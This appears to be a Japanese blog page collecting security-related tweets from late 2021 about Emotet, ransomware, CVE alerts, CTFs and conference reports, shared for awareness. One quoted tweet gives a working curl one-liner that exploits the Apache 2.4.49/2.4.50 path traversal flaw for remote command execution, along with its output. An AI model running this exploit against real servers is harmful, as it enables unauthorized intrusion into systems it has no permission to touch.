2021/12/5 セキュリティ関連Twitterメモ
はてなブログに投稿しました #はてなブログ #FoxonSecurity #セキュリティ 日本人パスワードは「数字」「キーボード配列」「日本人名」に加えて「繰り返し語」 - Fox on Security https://t.co/4SXHOo2HDK
— キタきつね (@foxbook) Nov 23, 2021
メールで #Phishing の注意喚起するのは最適解じゃないって広く知れ渡るといいな。デファングしてたとしても、その注意喚起のメールをパクられて #Phishing への誘導に悪用される懸念がある。ちゃんとSEOしてるページや公式アプリの「見やすいところ(これ重要)」で注意喚起すればいい。
— nakamuratomofumi (@tomoaxe) Nov 24, 2021
#vuls v0.19.0リリース! 米サイバーセキュリティ庁が先日公開した、野生の世界で実際に攻撃に使われている激ヤバCVEリストに該当するかを表示可能に。 https://t.co/DU8g7B8NFG 「 #セキュリティのアレ 第109回」で @MasafumiNegishi さんが紹介していたアレです。podcast定期購読しててよかった? https://t.co/CcQs0mQ5ws https://t.co/YF1cqudSUh
— vuls (@vuls_ja) Nov 24, 2021
11月よりAIセキュリティ情報発信ポータルの運用を開始しました。AI自体に対する攻撃が存在することを広く啓蒙するとともに、攻撃に対する防御手法をまとめて発信して参ります。AIの開発、利用時に認識しておくべきポイントを体系立てて纏めていきますので、ぜひご覧ください。 https://t.co/syHc7f89w8 https://t.co/6qBrhEBcy7
— MBSD NEWS (@mbsdnews) Nov 25, 2021
デジタル庁、報道機関向けのメール誤送信 アドレス400件をBCCではなくCCに記載 - ITmedia ビジネスオンライン https://t.co/5hpBvILCh8
— piyokango (@piyokango) Nov 24, 2021
ここでは、 2021/11/14以降に再構築されたマルウェア #Emotet とそのボットネット、それらを使う攻撃者(TA542、Mealybug)に関する情報を日本の情報を中心に世界の動向も交えながらまとめていきます。
— bom (@bomccss) Nov 16, 2021
スマートフォンの37%に音声チップの脆弱性、盗聴される恐れ https://t.co/1CPq01k9id
— モグ|セキュリティゼネラリスト (@moneymog) Nov 25, 2021
今日、警察庁から約400ページ分の不正指令電磁的記録罪の『申報』開示文書が届きました。現在内容を解析中です。ざっと最初の方を読んだけどCoinhive事件など仮想通貨のマイニングの摘発事件は県警独自の判断ではなく警察庁が指揮を執っていたとする記述があります。新事実だ。詳細は追って公開します https://t.co/wUDW65m1rv
— 齊藤貴義@『Wizard Bible事件から考えるサイバーセキュリティ』執筆中 (@miraihack) Nov 22, 2021
ドコモ装う不正アプリ被害、iPhoneでも確認 構成プロファイル悪用 https://t.co/3sc5aL00Tr https://t.co/qS0OimWIiG
— ITmedia NEWS (@itmedia_news) Nov 26, 2021
Best of Bug Bounty Mindmap #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytip https://t.co/SmcXtT2jG2
— Cybritex Security (@cybritexsec) Nov 26, 2021
JPCERT/CC's presentation materials regarding #Lazarus group presented at #codeblue_jp and #HITCON 2021 are now available on Github. ^YU https://t.co/9f9CQLpITn
— JPCERT/CC (@jpcert_en) Nov 26, 2021
Best of Penetration Testing Tools Cheatsheet (Part 2) #infosec #cybersecurity #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #networking #hacking #nmap #metasploit #tools https://t.co/O32RGRWUgX
— Hacking Articles (@hackinarticles) Nov 26, 2021
Red Teaming and Blue Teaming Cheatsheet Credit : https://t.co/KF2djq3caJ #infosec #cybersecurity #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #networking #wireshark #ctf #BlueTeam #Defence https://t.co/V1eHV7HfBM
— PentestSky (@pentestsky) Nov 26, 2021
2021/11/25(木)に 第13回 初心者のためのセキュリティ勉強会 で発表した資料です。 "スパイ養成CTF!? AVTokyo 2021の『Open xINT CTF』に参加した!" https://t.co/zoW3FguwdT 次の1年も技術研鑽を頑張ろう?? 目指せプロOSINTer! #sec4begin
— meow (@meow_noisy) Nov 27, 2021
ncはおろかNmapすら使えない場合を想定したPowerShellを用いたポートスキャニングテクニック。厳しくセキュリティコントロールされたワークステーションやプログラムのダウンロードができない環境で行うサバイバルであると言える。 https://t.co/tBrYr83D5C
— Новичо?к (@AlanIbr2049) Nov 27, 2021
Best of Penetration testing Certifications #infosec #cybersecurity #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #Linux #hacking #ctf #BlueTeam #ITsecurity #ctf #bugbountytips https://t.co/49l9tKcQqH
— Hacking Articles (@hackinarticles) Nov 27, 2021
Cyber Security Certification Jobs Cheatsheet #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #jobs #cissp https://t.co/1TK9YKp9iQ
— Hacking Articles (@hackinarticles) Nov 27, 2021
Penetration Testing Tools Cheatsheet Credit : @compasssecurity #infosec #cybersecurity #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #networking #hacking #nmap #metasploit #tools https://t.co/lJjP0yyTGA
— PentestSky (@pentestsky) Nov 28, 2021
Emotetの解析結果について(警察庁) https://t.co/mH4NB4kB0R
— にゃん☆たく (@taku888infinity) Nov 29, 2021
#Emotet artifacts, TTPs #DFIR Exec Flow: Office > CMD > PS > Rundll32 ?? #MalDoc Winword (docm) Excel (xlsm) RegSetValue HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[Random] Payload Path: C:\ProgramData\[Random].dll Export: Control_RunDLL https://t.co/vuGRR2U3V1
— Max_Malyutin (@Max_Mal_) Nov 28, 2021
Boss of the SOC 参加レポート - SSTエンジニアブログ https://t.co/KcHMWmFwm6 また参加してくださいね! #splunk
— 横田 聡 (@odorumurphys) Nov 29, 2021
Best of CISSP Cheatsheet (Part 1) Credit @Comparitech #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #riskmanagement #cissp https://t.co/dfc9ysMWiA
— Hacking Articles (@hackinarticles) Nov 29, 2021
Best of CISSP Cheatsheet (Part 2) Credit @Comparitech #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #riskmanagement #cissp https://t.co/XXlJlS0r7z
— Hacking Articles (@hackinarticles) Nov 29, 2021
「Zoom」アプリに待望の自動更新機能 ~Windows/Mac版の個人ユーザーでも利用可能に - 窓の杜 https://t.co/uWsSjpqe0J
— piyokango (@piyokango) Nov 30, 2021
急増する「ラテラルフィッシング」被害、2021年6月以降3倍に https://t.co/qBm2Zhe34e
— piyokango (@piyokango) Nov 29, 2021
2021年第3四半期のNICTER観測状況についてまとめたブログを公開しました! 「NICTER観測統計 - 2021年7月~9月」 https://t.co/zBkqwNlunx
— NICTER 解析チーム (@nicter_jp) Nov 30, 2021
お知らせ:CSIRTマテリアル更新 https://t.co/CwHKm8hzIn
— モグ|セキュリティゼネラリスト (@moneymog) Dec 1, 2021
『本キャンペーンの参加者は、本キャンペーンの実施期間中に、urlscan .io で対象となる Phishing サイトをスキャンすることでキャンペーンに参加することになります。』 LINE Anti Phishing キャンペーンを実施します。(2021/12/01 ~ 2022/02/28) https://t.co/pcRsz0UiUN
— Autumn Good (@autumn_good_35) Dec 2, 2021
Securify、少しだけ打ち合わせにも参加したのですが、自分たちの掲げるビジョンに基づいて、この領域を本当に変えようとしているプロダクトで将来性もヤバいので是非お試しください / スリーシェイク、自動脆弱性診断ツール「Securify」の無料提供を開始 | 3-shake https://t.co/MfldDeBFTB
— まつもとりー / Ryosuke Matsumoto (@matsumotory) Dec 1, 2021
マルウェアがよく悪用するWindows API: https://t.co/j8DTLzgsFK #マルウェア解析
— 田中ザック (@yamatosecurity) Dec 1, 2021
サイバー攻撃から1か月“機能停止”した病院のいま - Yahoo!ニュース https://t.co/AVYIKPjPxP https://t.co/TckrOir591
— セキュリティ・トレンド bot (@sec_trend) Dec 2, 2021
Emotetのテイクダウンなど各国法執行機関の協力でサイバー攻撃被害の減少が期待された2021年でしたが、結果としてはサイバー犯罪による社会への影響の大きい年となりました。2021年の締めくくりとして今年も2021年を振り返り、2022年のサイバー脅威の概況を予測します。 https://t.co/TrtmzjEM60 https://t.co/feTqutnJon
— Palo Alto NetworksJP (@PaloAltoNtwksJP) Dec 3, 2021
日経NETWORK(日経xTECH)連載「マルウエア徹底解剖」の今月号は、今年流出したランサムウェア攻撃グループ「Conti」の攻撃マニュアルの全貌とその内容を深掘りし分析&解説していきます。 <ランサム攻撃のマニュアルを読み解く> https://t.co/SMfGzBNAMl #ランサムウェア #サイバー攻撃 #Conti https://t.co/Jc3QZKVpQp
— MBSD NEWS (@mbsdnews) Dec 3, 2021
今年の12月は、TryHackMeに入門してアドベントカレンダーやってみることにしました。セキュリティの基礎知識を固めてくれそうな内容で、これなら無理なく最後まで走りきれそう。 これを機にセキュリティやCTFを始めるのにもとても良さそうなので、チョットセキュリティキニナルかたは是非!! https://t.co/iQRHVJqxH8
— kusuwada (@kusuwada) Dec 3, 2021
「個人情報保護規制の緩和、首相「具体的に考えたい」 会津若松市のスマートシティ視察」 https://t.co/f5qjaY0sNL 箱庭で緩和してもイノベーションにつながらない。日米欧の市場で勝負できなければDFFT政策もない。緩和というより医療創薬は仮名加工医療情報の特別法整備が鍵になるだろう。
— 鈴木 正朝 (@suzukimasatomo) Dec 4, 2021
2021/11/23 セキュリティ関連Twitterメモ
プリンターが止まらない 戦慄のランサムウエア 被害企業が語った|サイカルジャーナル|NHK NEWS WEB https://t.co/cIzvxfwdXl
— piyokango (@piyokango) Nov 9, 2021
セキュリティハイプサイクル(日本語)が出てます。(カタカナ率高いのがアレですが・・・) 「ガートナージャパン、2021年版のセキュリティハイプサイクルを発表」 https://t.co/6OcXW3oYzD
— キタきつね (@foxbook) Nov 9, 2021
マイクロソフトがExchange Server 2016/2019の不具合パッチを速やかに適用するよう警告。CVE-2021-42321が該当不具合。認証済の攻撃者による遠隔コード実行で、コマンドレット引数の不適切な検証に起因。既に限られた範囲で実際に悪用されていることが確認されている。 https://t.co/3hQORpGKhi
— kokum?t? (@__kokumoto) Nov 9, 2021
NRIセキュア、「MITRE ATT&CK」を用いたセキュリティ対策評価サービスを提供開始 ... https://t.co/cEs1xT3fmr https://t.co/pGWxwj75Uu
— セキュリティ・トレンド bot (@sec_trend) Nov 10, 2021
「攻めのセキュリティ」の研究の一環としてARM SoCに搭載されているCoreSightをファジングに活用したAFL++ CoreSight modeを公開しました。 詳細は下記のブログ記事をご覧ください。 https://t.co/oXgqHc0ONh
— 株式会社リチェルカセキュリティ (@RicercaSec_JP) Nov 10, 2021
11月に入り、新たなフィッシングによる被害の急増を観測しています。 できれば早期の警戒情報として自組織や関係組織、ご家族などに情報を共有いただき、脅威の認知と注意喚起に繋げていただけると幸いです。 https://t.co/vpDjVNVa1d
— ばらまきメール回収の会 (@retrieve_member) Nov 11, 2021
国内でも該当するとみられるものが結構ひっかかるのでご注意を。 『Randori has found numerous vulnerable instances exposed on internet-facing assets, in excess of 10,000 assets.』?? Zero-Day Disclosure: PAN GlobalProtect CVE-2021-3064 https://t.co/RjLwhl6Yw2 https://t.co/STWiZmoU1N
— Autumn Good (@autumn_good_35) Nov 11, 2021
『脆弱性に該当するバージョンPAN-OS 8.1~8.1.16の台数としてグローバルで6811台/日本国内で422台を確認できました。』 2021年11月12日 Palo Alto Networks社PAN-OSの脆弱性 CVE-2021-3064について - セキュリティ研究センターブログ https://t.co/KVeNRsueiN
— Autumn Good (@autumn_good_35) Nov 12, 2021
マクニカセキュリティ研究センターブログにて、2021年11月10日に公表されたPalo Alto Networks社のPAN-OSの脆弱性 CVE-2021-3064についての注意喚起記事を公開しました。 国内外で多くの脆弱なサーバを確認しておりますので、海外拠点含めて早めの対策をご検討ください。 https://t.co/CpOk9FKPXO
— 株式会社マクニカ ネットワークス カンパニー (@mncofficial2004) Nov 12, 2021
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events https://t.co/PSF6BQhVxN CTFの運営、作問、インフラのノウハウがまとまってる!素晴らしい??
— ほよたか (@takahoyo) Nov 14, 2021
「サイバー犯罪防止シンポジウム2021 in Kawasaki ~サイバー空間の脅威から会社を守ろう~」の動画が公開されました。 https://t.co/ffpqKN64Fw
— 三輪信雄 (@NobMiwa) Nov 15, 2021
自社から送付する際はともかくとして、取引先から送付されたメールでもフィルタするってのは、大企業の慣習からすると結構思いきった施策だなぁ。 「ファイルを共有するための別の手段を用意」するとのことだけど、そうしたサイトにプロキシでアクセスできない環境もあるだろうし混乱するかもね。 https://t.co/TLjWuPB7iS
— Takahiro YAMADA (@yamadamn) Nov 15, 2021
ゾクゾクしちゃう話だな、名和さんのこの話は/”2つ目はコンテストで見つかった脆弱性の扱いに「透明性」がないこと。” WindowsもiPhoneも「陥落」 中国ハッキング大会: 日本経済新聞 https://t.co/kolDNCLojF
— Fuyuki Takasawa (@Neko_Ohji) Nov 15, 2021
【パスワード付きzipファイルが添付されたメールおよび別送のパスワード記載メール(PPAP)に対する当社運用の変更について】 2022年1月26日より「パスワード付きzipファイルをフィルタにより削除し、メール本文のみ受信する」となります。 詳細はこちらをご覧ください。 https://t.co/KIxbBwBHCr
— IIJ (@IIJ_PR) Nov 15, 2021
Emotet malware is back and rebuilding its botnet via TrickBot https://t.co/PlW710ux1z
— piyokango (@piyokango) Nov 15, 2021
Emotet botnet returns after law enforcement mass-uninstall operation - The Record by Recorded Future https://t.co/8PIMCg6aQI
— piyokango (@piyokango) Nov 15, 2021
Analysis of RDP Attack Surface and Its Security by sunglin of Knownsec 404 Team. Read it on Seebug paper https://t.co/OY7jIzZkiI https://t.co/Dis8PPiStc
— Seebug (@seebug_team) Nov 15, 2021
Update on #Emotet. We are noticing now that bots are starting to spam on what we are calling the Epoch 4 botnet. There is only attachment based malspam seen so far with .docm or .xlsm(really XLSM with a lame AF Template "Excell") or password protected ZIPs(operation ZipLock). 1/x
— Cryptolaemus (@Cryptolaemus1) Nov 16, 2021
Emotet payload URL (shared by @executemalware): ?? https://t.co/yBeV54SkYd Emotet payload (DLL): ?? https://t.co/tqHTQH6eQz
— abuse.ch (@abuse_ch) Nov 15, 2021
JavaScriptなどを悪用しローカルでマルウェア構築する攻撃手法が急増。Microsoftが注意喚起 https://t.co/gqykTOpqVK
— モグ|セキュリティゼネラリスト (@moneymog) Nov 17, 2021
17000台のルーターの脆弱性リスト https://t.co/EUrUUcbhDJ
— Sen UENO (@sen_u) Nov 17, 2021
10月に最も活発なマルウェアはTrickbot、5回目のランクイン - 産経ニュース https://t.co/dNu70uNmBk
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Nov 17, 2021
I created a #CyberChef recipe to ease the extraction of URLs from the word document (.doc & .docm) which download #Emotet. It is not completely foolproof, but it worked 99% of the time for me. https://t.co/CV0CVh4Hdo https://t.co/qKN2HHvS1q
— Kostas (@Kostastsale) Nov 18, 2021
【テイクダウンされた「 #EMOTET 」が活動再開】 2021年11月15日以降、各地のリサーチャからEMOTETの活動再開の報告がされています。当社でも、EMOTETを拡散させる #マルウェアスパム 、新たなEMOTET本体やおよびC&Cサーバの活動再開を確認しています。 詳しくは↓ https://t.co/WUSKKsLxWW
— トレンドマイクロ (@trendmicro_jp) Nov 18, 2021
— Satoshi Suzuki(gebo) (@gebogebogeboge) Nov 18, 2021
攻撃者視点で内部をチェックする際は、このサイトは役に立つかと思います。 Router Setup and Security Checklist https://t.co/XtLcmpMCNp 「ルーターのIPアドレスや初期パスワードなどを検索できるウェブサイト「Modemly」を使ってみた」 https://t.co/btT13uX9uf
— キタきつね (@foxbook) Nov 20, 2021
[アップデート] AWS WAFのログを直接CloudWatch LogsおよびS3に出力可能になりました | DevelopersIO https://t.co/8qw1E1zVkE
— モグ|セキュリティゼネラリスト (@moneymog) Nov 21, 2021
HISYS Security Journal Vol.44が公開となりました。坂明氏にJC3理事としてインタビューに登場いただいています。また、日本よりむしろ海外のハッカーコミュニティで有名なエル・ケンタロウさんにも話を伺っています。https://t.co/O6iojtiOgS
— Kenichi Saito (@hj_saito) Nov 22, 2021
2021/11/9 セキュリティ関連Twitterメモ
WordPress のセキュリティ対策についてしゃべりました! https://t.co/lEx7FKK4TE #wpmeetupkyoto
— ym (@ym405nm) Nov 1, 2021
KDDIセキュリティ(au)を騙り偽apkをダウンロードさせる手口のフィッシングメール(SMS)を観測しました。 hivhtwyfaa[.]duckdns[.]org #au #KDDI #Phishing https://t.co/JPipQzG0Jt
— spammailinfo (@spammailinfo) Nov 1, 2021
素晴らしい、偉い、神、優良記事 裏垢特定の考察と防御について https://t.co/F5aDEtzLif
— SttyK (してぃーきっず) (@SttyK) Nov 1, 2021
【サイバー人材19万人不足 戦略は】 https://t.co/zfGFVoT4Y2 国内外で大規模なサイバー犯罪が増えており、昨年1年間の日本の被害額は220億円という推計もある。日本のサイバーセキュリティ人材は19万人も足りないといわれ、喫緊の課題となっている。このギャップをどう埋めるのか。
— Yahoo!ニュース (@YahooNewsTopics) Nov 1, 2021
@takashikiso 芸人とジャーナリストを同じ舞台で動かさせること自体がおかしいんだけどねぇ。 芸人さんがジャーナリストと同じだけ勉強しろなんて言われても、無茶な話ですからねぇ。
— ちょねぽす@駆け出しエンジニア (@tyonepos_infra) Nov 1, 2021
徳島県の町立病院でランサムウエア感染、侵入経路は遠隔保守用の通信回線か https://t.co/3vz6dbLW6q
— piyokango (@piyokango) Nov 1, 2021
From Zero to Domain Admin ??Initial Access: Maldoc deploys Hancitor ??C2: #CobaltStrike & #Hancitor ??Discovery: net, nltest, check.exe, AD module, scan for backup systems ??Privilege Escalation: Zerologon CVE-2020-1472 https://t.co/gtiUAi9EQN
— The DFIR Report (@TheDFIRReport) Nov 1, 2021
CPUの脆弱性Spectreが発見され、ブラウザは大きな変化を余儀なくされました。それが一体どういったものだったのか、どういう対策を行うことで自分のウェブサイトの安全性を保つことができるのかをまとめました。 // Spectre の脅威とウェブサイトが設定すべきヘッダーについて https://t.co/2oFZpeL7kz
— Eiji Kitamura / えーじ (@agektmr) Nov 1, 2021
はてなブログに投稿しました #はてなブログ オムニECサイトへの不正アクセスについてまとめてみた - piyolog https://t.co/i7ohyrjV1k
— piyokango (@piyokango) Nov 2, 2021
東京五輪を狙った4.5億回のサイバー攻撃、防ぎきった官民の連携力とは https://t.co/RkytpiP5XW "2021年7月23日~9月5日の大会期間中に関係組織や公式サイトなどで検知・遮断した不正通信などの攻撃回数は4.5億回に達した。2012年のロンドン大会で検知した攻撃回数の2億回に対して2倍以上である"
— ねこさん?(ΦωΦ) (@catnap707) Nov 4, 2021
ウクライナ保安庁(SSU)がGamaredonAPTグループのメンバーに関する個人情報を公開した。クリミア半島のセヴァストポリ市にいるFSBが関与しているとのこと。 SSU identified FSB hackers who carried out more than 5,000 cyberattacks on state bodies of Ukraine (video) https://t.co/KUiQkZK6PO https://t.co/YaC2GP5Xyd
— SttyK (してぃーきっず) (@SttyK) Nov 4, 2021
「From Zero to Domain Admin」 メールからドメイン管理者権限奪取までの事例 https://t.co/yPys6hVStO
— 三輪信雄 (@NobMiwa) Nov 4, 2021
DDoS Attack Trends for Q3 2021 https://t.co/kUVSCorK4a
— Masafumi Negishi (@MasafumiNegishi) Nov 5, 2021
1Tbpsを超えるDDoS攻撃にGitLabサーバーが悪用されていると判明 - GIGAZINE https://t.co/7AHAhR5vkl
— piyokango (@piyokango) Nov 5, 2021
東京五輪 サイバー攻防戦(上)ウイルスが、偽のライブ配信が|サイカルジャーナル|NHK NEWS WEB https://t.co/saFZGnl518
— piyokango (@piyokango) Nov 5, 2021
“セキュリティーの考え方として、攻撃された時の被害コストよりも対策のコストが上回る場合には、そのリスクを受容する場合もあります…リスクを受容しようとしない風潮がそもそもセキュリティー対策と相いれないのです” https://t.co/rkGfodEliW
— ねこさん?(ΦωΦ) (@catnap707) Nov 6, 2021
東京五輪 サイバー攻防戦(下)4億5千万回のシグナル|サイカルジャーナル|NHK NEWS WEB https://t.co/gf1x3A2He6
— Autumn Good (@autumn_good_35) Nov 5, 2021
Europol: Seven REvil/GandCrab ransomware affiliates were arrested in 2021 - The Record by Recorded Future https://t.co/lZRMSXxehf
— piyokango (@piyokango) Nov 8, 2021
Five affiliates to Sodinokibi/REvil unplugged | Europol https://t.co/ESwoYDUnER
— Masafumi Negishi (@MasafumiNegishi) Nov 9, 2021
2021/11/1 セキュリティ関連Twitterメモ
面白い基調講演だった。色んな人に伝えていくことも我々の責務ですね #DevelopersIO [レポート]基調講演1:「サイバーセキュリティの万華鏡を揺らす ? 人間行動とサイバーセキュリティへの没入型調査」 ? CODE BLUE 2021 #codeblue_jp https://t.co/XaUdEm9dhX
— けーにー (@ke_ni_) Oct 19, 2021
#DevelopersIO [レポート][OpenTalks]インターネットの通信量が映す社会の動き ? CODE BLUE 2021 #codeblue_jp https://t.co/eGy9yaskw8
— けーにー (@ke_ni_) Oct 19, 2021
[レポート]ProxyLogonは氷山の一角、Microsoft Exchange Serverの新たなアタック・サーフェス! ? CODE BLUE 2021 #codeblue_jp | DevelopersIO https://t.co/YRy8H4qg8f
— Yosuke Katsuki (@yokatsuki) Oct 19, 2021
[レポート][Microsoft Corporation]Microsoft のバグハンティング|脆弱性発見者へのインタビューとMSRCについて ? CODE BLUE 2021 #codeblue_jp | DevelopersIO https://t.co/Db2BtvrzuB
— Yosuke Katsuki (@yokatsuki) Oct 19, 2021
とても興味深い講演でした。やはりテクニカルな観点からの分析は聞いていてワクワクする反面、攻撃者は広く知られているツールなどを使って侵入を試みるため、一意の特徴づけが難しそうだと感じました。が、私にはできないことなのでぜひ頑張って欲しい…! https://t.co/WW2gqvzu34 #codeblue_jp
— motter (@CyberAnalitica) Oct 19, 2021
[レポート]NAS as Not As Secure(NASはそれほど安全ではない) ? CODE BLUE 2021 #codeblue_jp | DevelopersIO https://t.co/VVef5fswKe
— Yosuke Katsuki (@yokatsuki) Oct 19, 2021
“[レポート]セキュリティのアレ ~ 知識と技術とあと2つ ~ ? CODE BLUE 2021 #codeblue_jp | DevelopersIO” https://t.co/qbxFIzVOmX
— 'or/**/1=1#' (@waiha8) Oct 19, 2021
現在公開されている範囲において全世界で最も詳細なLockBit2.0ランサムウェアの解析記事を公開しました。未だ知られていない様々な解析情報を盛り込みましたのでぜひご覧ください。 ●ブログ記事はこちら↓ https://t.co/4p5aNdueY5 https://t.co/NBr7APl5Oj
— MBSD NEWS (@mbsdnews) Oct 19, 2021
日立システムズさんの話レポートだん Dis-information対策、いろんな課題がありますな #DevelopersIO [レポート][株式会社日立システムズ]DXが実現する持続可能な社会のために ? CODE BLUE 2021 #codeblue_jp https://t.co/4jB5iJygMT
— けーにー (@ke_ni_) Oct 20, 2021
本日聞けた講演の中で最も面白かった発表 https://t.co/z2m3GRHHsc ペネトレを自動化するためにゲームAIを導入するという部分がアイデア的に非常に面白かった Hack The Boxの一部のマシンも自動で攻略してるらしい #codeblue_jp
— Tasker (@task4233) Oct 19, 2021
[レポート]”2020″ サブドメインは本当に悪用されたのか? ー サブドメインに埋もれた真の脅威に迫る ? CODE BLUE 2021 #codeblue_jp | DevelopersIO https://t.co/PFYsljWL94
— Yosuke Katsuki (@yokatsuki) Oct 20, 2021
[レポート][日本電気株式会社]今、改めて考えるサイバーレジリエンス ? CODE BLUE 2021 #codeblue_jp | DevelopersIO https://t.co/TBKVgo5OHQ
— Yosuke Katsuki (@yokatsuki) Oct 20, 2021
[レポート]ランサムウェアとの関わり ? 復号とワクチン ? CODE BLUE 2021 #codeblue_jp | DevelopersIO https://t.co/0ncmPzqrXF
— Yosuke Katsuki (@yokatsuki) Oct 20, 2021
[レポート]Operation VPNOver: VPNの欠陥を利用したDragonOKの東アジアへの持続的な攻撃 ? CODE BLUE 2021 #codeblue_jp | DevelopersIO https://t.co/VV24BWqVv2
— Yosuke Katsuki (@yokatsuki) Oct 20, 2021
[レポート]ラストマイル問題: ウェブマーケターが追加するサードパーティスクリプトという盲点 ? CODE BLUE 2021 #codeblue_jp | DevelopersIO https://t.co/jVmFScQauO
— Yosuke Katsuki (@yokatsuki) Oct 20, 2021
[レポート]基調講演2:デジタル社会における脅威と向き合う ? CODE BLUE 2021 #codeblue_jp | DevelopersIO https://t.co/6OBxw0TXUt
— Yosuke Katsuki (@yokatsuki) Oct 20, 2021
[レポート][株式会社日立システムズ]DXが実現する持続可能な社会のために ? CODE BLUE 2021 #codeblue_jp | DevelopersIO https://t.co/iA2ZN1SQbA
— Yosuke Katsuki (@yokatsuki) Oct 20, 2021
MDMで管理された3万台超の端末で意図せず発生した強制ロックについてまとめてみた - piyolog https://t.co/QHYRw63e0n
— にゃん☆たく (@taku888infinity) Oct 21, 2021
Open xINT CTF 2021のwriteup - st98 の日記帳 - コピー https://t.co/fPFv5PuNGt 書きました #avtokyo
— st98 (@st98_) Oct 24, 2021
Important @CISAgov alert: Malware inserted into widely used JavaScript library (npm package) AParser.js which reads information stored inside user-agent strings. Developers must update to patched versions: 0.7.30, 0.8.1, 1.0.1 https://t.co/gkPI98pyev
— Rob Joyce (@NSA_CSDirector) Oct 23, 2021
件数だけを取り上げ論じることは、ロンドン五輪のCIOであるGary Pennell氏の言葉を借りると、まさに「It's all rubbish, it's nonsense」なんですよね。 東京オリンピック・パラへのサイバー攻撃4.5億回 ロンドンの2倍:朝日新聞デジタル https://t.co/apCVnoiJnW
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Oct 23, 2021
セキュリティエンジニア御用達ProcessHackerにDriver証明書がつかなくなるらしい。 困る人が多そう https://t.co/YpuX7hRbGT
— daem0nc0re (@daem0nc0re) Oct 24, 2021
BlackMatter ransomware victims quietly helped using secret decryptor - @LawrenceAbrams https://t.co/yWyKbIZh8P
— BleepingComputer (@BleepinComputer) Oct 24, 2021
コンサルがランサムウエア被害 圏央道工事の発注時期が見直しに https://t.co/CTDfHu9WgD
— にゃん☆たく (@taku888infinity) Oct 25, 2021
攻撃グループLuoYuが使用するマルウェアWinDealer - JPCERT/CC Eyes | JPCERTコーディネーションセンター公式ブログ https://t.co/iqDgtnFCR9
— piyokango (@piyokango) Oct 26, 2021
ドコモ、利用のない「dアカウント」をロックへ 不正利用対策 https://t.co/7qg1ekH5XW dアカウントが失効します、的なフィッシングメールが出回らない事を祈ってます。(まぁもう既にあるか)
— にゃん☆たく (@taku888infinity) Oct 27, 2021
ランサムウェア「Ranzy Locker」、FBIが対策方法を公開 | TECH+ https://t.co/NNVz0gO9h6
— にゃん☆たく (@taku888infinity) Oct 28, 2021
Risk-based Security Decision Making at Netflix #転記 - Netflixがどうセキュリティリスクを定量化しているか - よくあるALEだが、そこはNetflix、このビデオでHowをがっつり説明 - モンテかルロシミュレーションなど統計やモデリング手法でがっつり https://t.co/Qc90nMontS
— ken\d|\x (@ken5scal) Oct 28, 2021
Most #IoT malware #botnets including Mirai and QBot count on getting access to the victim using weak/default credentials. here some fresh list https://t.co/d7vrTSmJ2d https://t.co/ZUXHLssXNp
— R. Bansal (@0xrb) Oct 29, 2021
#転記 電子カルテシステムは、専用回線でしか接続できず、セキュリティソフトなど不正アクセスを防ぐ対策を取っていた。ネットワークやUSB経由での感染が疑われる 閉域網ががっつりやられた公表は本邦初? https://t.co/IiJooSAI2C
— ken\d|\x (@ken5scal) Oct 31, 2021
2021/10/18 セキュリティ関連Twitterメモ
弊社、実はひっそりとエンジニアブログを始めてました! 導入編では、サイバー脅威インテリジェンスとは何か?からどんな環境を準備すればいいのかを紹介してます。 今日からできるサイバー脅威インテリジェンスの話-導入編- - NFLabs. エンジニアブログ https://t.co/mPfh4tmIYs
— ほよたか (@takahoyo) Oct 3, 2021
自作EDR、良いですね。 Windows Kernelの知識を深めたい人は読むべし https://t.co/KT05fdgB1J
— daem0nc0re (@daem0nc0re) Oct 5, 2021
ランサムウェアに対する身代金支払い: 影響を考慮して、禁止の悪影響を軽減するために政府が考慮すべき事項 - 時系列 - 禁止事項 - 被害者保護と支援 https://t.co/XLnkJVCzSE ここでも「禁止」は行動を水面下に追いやるという議論になるのだなあ。 #yuzawaws
— 伊藤 彰嗣 / Akitsugu Ito (@springmoon6) Oct 8, 2021
脆弱性の修正が不十分だった今回の問題は、IIJ の SOC メンバーが(も)発見し報告しました。GJ! Apache HTTP Server 2.4.50におけるパストラバーサル脆弱性(CVE-2021-42013)の発見 ? wizSafe Security Signal -安心・安全への道標- IIJ https://t.co/z3qYGt3Bbe
— Masafumi Negishi (@MasafumiNegishi) Oct 8, 2021
RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013): root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id' uid=1(daemon) gid=1(daemon) groups=1(daemon)
— ? Roman Medina-Heigl Hernandez (@roman_soft) Oct 7, 2021
ブログで「標的型攻撃グループBlackTechが使用するマルウェアFlagproについて」を公開しました。 https://t.co/RmUJCB9edd
— NTT Ltd. Japanese (@GlobalNTT_JP) Oct 8, 2021
IoT機器、脆弱性放置12万台 サイバー攻撃の恐れ: 日本経済新聞 https://t.co/uGk9LOlB2Z
— piyokango (@piyokango) Oct 9, 2021
社内CTFで出題した問題 | 調査研究/ブログ | 三井物産セキュアディレクション株式会社 https://t.co/bu5vbiXU6T 大和セキュリティの時は他の問題やってて手つけられなかったけど、暗号化されたパスワードの鍵が同じファイルに書かれていて、それを使ってパスワードを復号する問題だったのか
— ほよたか (@takahoyo) Oct 10, 2021
ブログ書いた。 https://t.co/a95C9cq3vC
— defenceability (@defenceability) Oct 12, 2021
東京大学管理のHPCI機材への不正アクセスについて 東京大学情報基盤センター 2021年10月15日 https://t.co/VHkPM3q4F8
— piyokango (@piyokango) Oct 15, 2021
